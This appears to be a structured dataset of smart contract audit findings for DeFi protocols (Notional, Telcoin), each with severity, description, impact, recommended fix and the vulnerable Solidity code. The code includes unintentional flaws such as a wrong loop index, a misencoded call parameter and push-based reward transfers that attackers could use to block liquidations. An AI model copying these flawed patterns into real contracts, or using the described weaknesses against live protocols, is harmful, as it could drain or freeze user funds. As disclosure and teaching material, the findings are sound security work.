external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}(\"\");\\n require(status);\\n } else {\\n IERC20(token).transfer(msg.sender, amount);\\n }\\n }\\n```\\n -Malicious users could block liquidation or perform DOSчmediumчThe current implementation uses a \"push\" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit. An attacker could intentionally affect the outcome of the transfer to gain a certain advantage or carry out certain attack.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.\\nPer the Audit Scope Documentation provided by the protocol team on the contest page, the reward tokens can be any arbitrary ERC20 tokens\\nWe are extending this functionality to allow nTokens to be incentivized by a secondary reward token. On Arbitrum, this will be ARB as a result of the ARB STIP grant. In the future, this may be any arbitrary ERC20 token\\nLine 231 of the `_claimRewards` function below might revert due to various issues such as:\\ntokens with blacklisting features such as USDC (users might intentionally get into the blacklist to achieve certain outcomes)\\ntokens with hook, which allow the target to revert the transaction intentionally\\nunexpected error in the token's contract\\n```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n\\nIf a revert occurs, the following functions are affected:\\n```\\n_claimRewards -> claimRewardsDirect\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize -> Used by many functions\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External)\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External) -> claimNOTE (External)\\n```\\nчThe current implementation uses a \"push\" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit.\\nConsider adopting a pull method for users to claim their rewards instead so that the transfer of reward tokens is disconnected from the updating of reward balances.чMany of the core functionalities of the protocol will be affected by the revert. Specifically, the `BalancerHandler._finalize` has the most impact as this function is called by almost every critical functionality of the protocol, including deposit, withdrawal, and liquidation.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.ч```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n -Unexpected behavior when calling certain ERC4626 functionsчmediumчUnexpected behavior could occur when certain ERC4626 functions are called during the time windows when the fCash has matured but is not yet settled.\\nWhen the fCash has matured, the global settlement does not automatically get executed. The global settlement will only be executed when the first account attempts to settle its own account. The code expects the `pr.supplyFactor` to return zero if the global settlement has not been executed yet after maturity.\\nPer the comment at Line 215, the design of the `_getMaturedCashValue` function is that it expects that if fCash has matured AND the fCash has not yet been settled, the `pr.supplyFactor` will be zero. In this case, the cash value will be zero.\\n```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n\\nDuring the time window where the fCash has matured, and none of the accounts triggered an account settlement, the `_getMaturedCashValue` function at Line 33 below will return zero, which will result in the `totalAssets()` function returning zero.\\n```\\nFile: wfCashERC4626.sol\\n function totalAssets() public view override returns (uint256) {\\n if (hasMatured()) {\\n // We calculate the matured cash value of the total supply of fCash. This is\\n // not always equal to the cash balance held by the wrapper contract.\\n uint256 primeCashValue = _getMaturedCashValue(totalSupply());\\n require(primeCashValue < uint256(type(int256).max));\\n int256 externalValue = NotionalV2.convertCashBalanceToExternal(\\n getCurrencyId(), int256(primeCashValue), true\\n );\\n return externalValue >= 0 ? uint256(externalValue) : 0;\\n..SNIP..\\n```\\nчDocument the unexpected behavior of the affected functions that could occur during the time windows when the fCash has matured but is not yet settled so that anyone who calls these functions is aware of them.чThe `totalAssets()` function is utilized by key ERC4626 functions within the wrapper, such as the following functions. The side effects of this issue are documented below:\\n`convertToAssets` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` > `maxWithdraw` (Impact = max withdrawal is always zero)\\n`convertToShares` (Impact = Division by zero error, Revert)\\n`convertToShares` > `previewWithdraw` (Impact = Revert)\\nIn addition, any external protocol integrating with wfCash will be vulnerable within this time window as an invalid result (zero) is returned, or a revert might occur. For instance, any external protocol that relies on any of the above-affected functions for computing the withdrawal/minting amount or collateral value will be greatly impacted as the value before the maturity might be 10000, but it will temporarily reset to zero during this time window. Attackers could take advantage of this time window to perform malicious actions.ч```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n -getOracleData() maxExternalDeposit not accurateчmediumчin `getOracleData()` The calculation of `maxExternalDeposit` lacks consideration for `reserve.accruedToTreasury`. This leads to `maxExternalDeposit` being too large, causing `Treasury.rebalance()` to fail.\\nin `getOracleData()`\\n```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n\\nHowever, AAVE's restrictions are as follows: ValidationLogic.sol#L81-L88\\n```\\n require(\\n supplyCap == 0 ||\\n ((IAToken(reserveCache.aTokenAddress).scaledTotalSupply() +\\n uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex) + amount) <=\\n supplyCap * (10 ** reserveCache.reserveConfiguration.getDecimals()),\\n Errors.SUPPLY_CAP_EXCEEDED\\n );\\n }\\n```\\n\\nThe current implementation lacks subtraction of `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`.чsubtract `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`чAn overly large `maxExternalDeposit` may cause `rebalance()` to be unable to execute.ч```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n -getTargetExternalLendingAmount() when targetUtilization == 0 no check whether enough externalUnderlyingAvailableForWithdrawчmediumчin `getTargetExternalLendingAmount()` When `targetUtilization == 0`, it directly returns `targetAmount=0`. It lacks the judgment of whether there is enough `externalUnderlyingAvailableForWithdraw`. This may cause `_rebalanceCurrency()` to `revert` due to insufficient balance for `withdraw`.\\nwhen `setRebalancingTargets()` , we can setting all the targets to zero to immediately exit money it will call `_rebalanceCurrency() -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount()`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n uint256 forRedemption = oracleData.currentExternalUnderlyingLend - targetAmount;\\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n targetAmount = targetAmount.add(\\n // unchecked - is safe here, overflow is not possible due to above if conditional\\n forRedemption - oracleData.externalUnderlyingAvailableForWithdraw\\n );\\n }\\n }\\n```\\n\\nWhen `targetUtilization==0`, it returns `targetAmount ==0`. It lacks the other judgments of whether the current `externalUnderlyingAvailableForWithdraw` is sufficient. Exceeding `externalUnderlyingAvailableForWithdraw` may cause `_rebalanceCurrency()` to revert.\\nFor example: `currentExternalUnderlyingLend = 100` `externalUnderlyingAvailableForWithdraw = 99` If `targetUtilization` is modified to `0`, then `targetAmount` should be `1`, not `0`. `0` will cause an error due to insufficient available balance for withdrawal.\\nSo, it should still try to withdraw as much deposit as possible first, wait for replenishment, and then withdraw the remaining deposit until the deposit is cleared.чRemove `targetUtilization == 0` directly returning 0.\\nThe subsequent logic of the method can handle `targetUtilization == 0` normally and will not cause an error.\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n// Remove the line below\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n```\\nчA too small `targetAmount` may cause AAVE withdraw to fail, thereby causing the inability to `setRebalancingTargets()` to fail.ч```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n uint256 forRedemption = oracleData.currentExternalUnderlyingLend - targetAmount;\\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n targetAmount = targetAmount.add(\\n // unchecked - is safe here, overflow is not possible due to above if conditional\\n forRedemption - oracleData.externalUnderlyingAvailableForWithdraw\\n );\\n }\\n }\\n```\\n -getTargetExternalLendingAmount() targetAmount may far less than the correct valueчmediumчWhen calculating `ExternalLending.getTargetExternalLendingAmount()`, it restricts `targetAmount` greater than `oracleData.maxExternalDeposit`. However, it does not take into account that `oracleData.maxExternalDeposit` includes the protocol deposit `currentExternalUnderlyingLend` This may result in the returned quantity being far less than the correct quantity.\\nin `getTargetExternalLendingAmount()` It restricts `targetAmount` greater than `oracleData.maxExternalDeposit`.\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n targetAmount = SafeUint256.min(\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n\\nthis is : `targetAmount = min(targetExternalUnderlyingLend, maxExternalUnderlyingLend, oracleData.maxExternalDeposit)`\\nThe problem is that when calculating `oracleData.maxExternalDeposit`, it does not exclude the existing deposit `currentExternalUnderlyingLend` of the current protocol.\\nFor example: `currentExternalUnderlyingLend = 100` `targetExternalUnderlyingLend = 100` `maxExternalUnderlyingLend = 10000` `oracleData.maxExternalDeposit = 0` (All AAVE deposits include the current deposit currentExternalUnderlyingLend)\\nIf according to the current calculation result: `targetAmount=0`, this will result in needing to withdraw `100`. (currentExternalUnderlyingLend - targetAmount)\\nIn fact, only when the calculation result needs to increase the `deposit` (targetAmount > currentExternalUnderlyingLend), it needs to be restricted by `maxExternalDeposit`.\\nThe correct one should be neither deposit nor withdraw, that is, `targetAmount=currentExternalUnderlyingLend = 100`.чOnly when `targetAmount > currentExternalUnderlyingLend` is a deposit needed, it should be considered that it cannot exceed `oracleData.maxExternalDeposit`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n targetAmount = SafeUint256.min(\\n// Remove the line below\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n// Remove the line below\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n// Remove the line below\\n // is floored at zero.\\n// Remove the line below\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n// Remove the line below\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n// Remove the line below\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n// Remove the line below\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n// Remove the line below\\n );\\n\\n// Add the line below\\n targetAmount = SafeUint256.min(uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),maxExternalUnderlyingLend);\\n// Add the line below\\n if (targetAmount > oracleData.currentExternalUnderlyingLend) { //when deposit , must check maxExternalDeposit\\n// Add the line below\\n uint256 forDeposit = targetAmount // Remove the line below\\n oracleData.currentExternalUnderlyingLend;\\n// Add the line below\\n if (forDeposit > oracleData.maxExternalDeposit) {\\n// Add the line below\\n targetAmount = targetAmount.sub(\\n// Add the line below\\n forDeposit // Remove the line below\\n oracleData.maxExternalDeposit\\n// Add the line below\\n ); \\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\nчA too small `targetAmount` will cause the withdrawal of deposits that should not be withdrawn, damaging the interests of the protocol.ч```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n targetAmount = SafeUint256.min(\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n -`wfCashERC4626`чmediumчThe `wfCash` vault is credited less prime cash than the `wfCash` it mints to the depositor when its underlying asset is a fee-on-transfer token. This leads to the vault being insolvent because it has issued more shares than can be redeemed.\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n\\n```\\n } else {\\n // In the case of deposits, we use a balance before and after check\\n // to ensure that we record the proper balance change.\\n actualTransferExternal = GenericToken.safeTransferIn(\\n underlying.tokenAddress, account, underlyingExternalDeposit\\n ).toInt();\\n }\\n\\n netPrimeSupplyChange = _postTransferPrimeCashUpdate(\\n account, currencyId, actualTransferExternal, underlying, primeRate\\n );\\n```\\n\\n```\\n // Mints ERC20 tokens for the receiver\\n _mint(receiver, fCashAmount);\\n```\\n\\nIn the case of lending at 0% interest, `fCashAmount` is equal to `depositAmount` but at 1e8 precision.\\nTo simplify the example, let us assume that there are no other depositors. When the sole depositor redeems all their `wfCash` shares at maturity, they will be unable to redeem all their shares because the `wfCash` vault does not hold enough prime cash.чConsider adding the following:\\nA flag in `wfCashERC4626` that signals that the vault's asset is a fee-on-transfer token.\\nIn `wfCashERC4626._previewMint()` and `wfCashERC46262._previewDeposit`, all calculations related to `assets` should account for the transfer fee of the token.чAlthough the example used to display the vulnerability is for the case of lending at 0% interest, the issue exists for minting any amount of shares.\\nThe `wfCashERC4626` vault will become insolvent and unable to buy back all shares. The larger the total amount deposited, the larger the deficit. The deficit is equal to the transfer fee. Given a total deposit amount of 100M USDT and a transfer fee of 2% (assuming a transfer fee was set and enabled for USDT), 2M USDT will be the deficit.\\nThe last depositors to redeem their shares will be shouldering the loss.ч```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n -`ExternalLending`чmediumчWhen the Treasury rebalances and has to redeem aTokens from AaveV3, it checks that the actual amount withdrawn is greater than or equal to the set `withdrawAmount`. This check will always fail for fee-on-transfer tokens since the `withdrawAmount` does not account for the transfer fee.\\n```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n\\nNote that the third field in the `RedeemData` struct is the `expectedUnderlying` field which is set to the `withdrawAmount` and that `withdrawAmount` is a value greater than zero.\\n```\\n for (uint256 j; j < data.targets.length; j++) {\\n GenericToken.executeLowLevelCall(data.targets[j], 0, data.callData[j]);\\n }\\n\\n // Ensure that we get sufficient underlying on every redemption\\n uint256 newUnderlyingBalance = TokenHandler.balanceOf(underlyingToken, address(this));\\n uint256 underlyingBalanceChange = newUnderlyingBalance.sub(oldUnderlyingBalance);\\n // If the call is not the final redemption, then expectedUnderlying should\\n // be set to zero.\\n require(data.expectedUnderlying <= underlyingBalanceChange);\\n```\\n\\n```\\nredeemAmounts[0] = currentAmount - targetAmount;\\n```\\n\\nIt does not account for transfer fees. In effect, that check will always revert when the underlying being withdrawn is a fee-on-transfer token.чWhen computing for the `withdrawAmount / data.expectedUnderlying`, it should account for the transfer fees. The pseudocode for the computation may look like so:\\n```\\nwithdrawAmount = currentAmount - targetAmount\\nif (underlyingToken.hasTransferFee) {\\n withdrawAmount = withdrawAmount / (100% - underlyingToken.transferFeePercent)\\n}\\n```\\nч```\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n ExternalLending.redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n```\\n\\nThis means that these tokens can only be deposited into AaveV3 but can never redeemed. This can lead to insolvency of the protocol.ч```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n -`StakingRewardsManager::topUp(...)` Misallocates Funds to `StakingRewards` ContractsчhighчThe `StakingRewardsManager::topUp(...)` contract exhibits an issue where the specified `StakingRewards` contracts are not topped up at the correct indices, resulting in an incorrect distribution to different contracts.\\nThe `StakingRewardsManager::topUp(...)` function is designed to top up multiple `StakingRewards` contracts simultaneously by taking the indices of the contract's addresses in the `StakingRewardsManager::stakingContracts` array. However, the flaw lies in the distribution process:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n\\nGitHub: [254-278]\\nThe rewards are not appropriately distributed to the `StakingRewards` contracts at the specified indices. Instead, they are transferred to the contracts at the loop indices. For instance, if intending to top up contracts at indices `[1, 2]`, the actual top-up occurs at indices `[0, 1]`.чIt is recommended to do the following changes:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i// Add the line below\\n// Add the line below\\n) {\\n // get staking contract and config\\n// Remove the line below\\n StakingRewards staking = stakingContracts[i];\\n// Add the line below\\n StakingRewards staking = stakingContracts[indices[i]];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\nчThe consequence of this vulnerability is that rewards will be distributed to the incorrect staking contract, leading to potential misallocation and unintended outcomesч```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n -Wrong parameter when retrieving causes a complete DoS of the protocolчhighчA wrong parameter in the `_retrieve()` prevents the protocol from properly interacting with Sablier, causing a Denial of Service in all functions calling `_retrieve()`.\\nThe `CouncilMember` contract is designed to interact with a Sablier stream. As time passes, the Sablier stream will unlock more TELCOIN tokens which will be available to be retrieved from `CouncilMember`.\\nThe `_retrieve()` internal function will be used in order to fetch the rewards from the stream and distribute them among the Council Member NFT holders (snippet reduced for simplicity):\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThe most important part in `_retrieve()` regarding the vulnerability that we'll dive into is the `_stream.execute()` interaction and the params it receives. In order to understand such interaction, we first need understand the importance of the `_stream` and the `_target` variables.\\nSablier allows developers to integrate Sablier via Periphery contracts, which prevents devs from dealing with the complexity of directly integrating Sablier's Core contracts. Telcoin developers have decided to use these periphery contracts. Concretely, the following contracts have been used:\\nNOTE: It is important to understand that the actual lockup linear stream will be deployed as well. The difference is that the Telcoin protocol will not interact with that contract directly. Instead, the PRBProxy and proxy target contracts will be leveraged to perform such interactions.\\nKnowing this, we can now move on to explaining Telcoin's approach to withdrawing the available tokens from the stream. As seen in the code snippet above, the `_retrieve()` function will perform two steps to actually perform a withdraw from the stream:\\nIt will first call the _stream's `execute()` function (remember `_stream` is a PRBProxy). This function receives a `target` and some `data` as parameter, and performs a delegatecall aiming at the target:\\nIn the `_retrieve()` function, the target where the call will be forwarded to is the `_target` parameter, which is a ProxyTarget contract. Concretely, the delegatecall function that will be triggered in the ProxyTarget will be withdrawMax():\\nAs we can see, the `withdrawMax()` function has as parameters the `lockup` stream contract `to` withdraw from, the `streamId` and the address `to` which will receive the available funds from the stream. The vulnerability lies in the parameters passed when calling the `withdrawMax()` function in `_retrieve()`. As we can see, the first encoded parameter in the `encodeWithSelector()` call after the selector is the _target:\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, // <------- This is incorrect\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThis means that the proxy target's `withdrawMax()` function will be triggered with the `_target` contract as the `lockup` parameter, which is incorrect. This will make all calls eventually execute `withdrawMax()` on the PRBProxy contract, always reverting.\\nThe parameter needed to perform the `withdrawMax()` call correctly is the actual Sablier lockup contract, which is currently not stored in the `CouncilMember` contract.\\nThe following diagram also summarizes the current wrong interactions for clarity:чIn order to fix the vulnerability, the proper address needs to be passed when calling `withdrawMax()`.\\nNote that the actual stream address 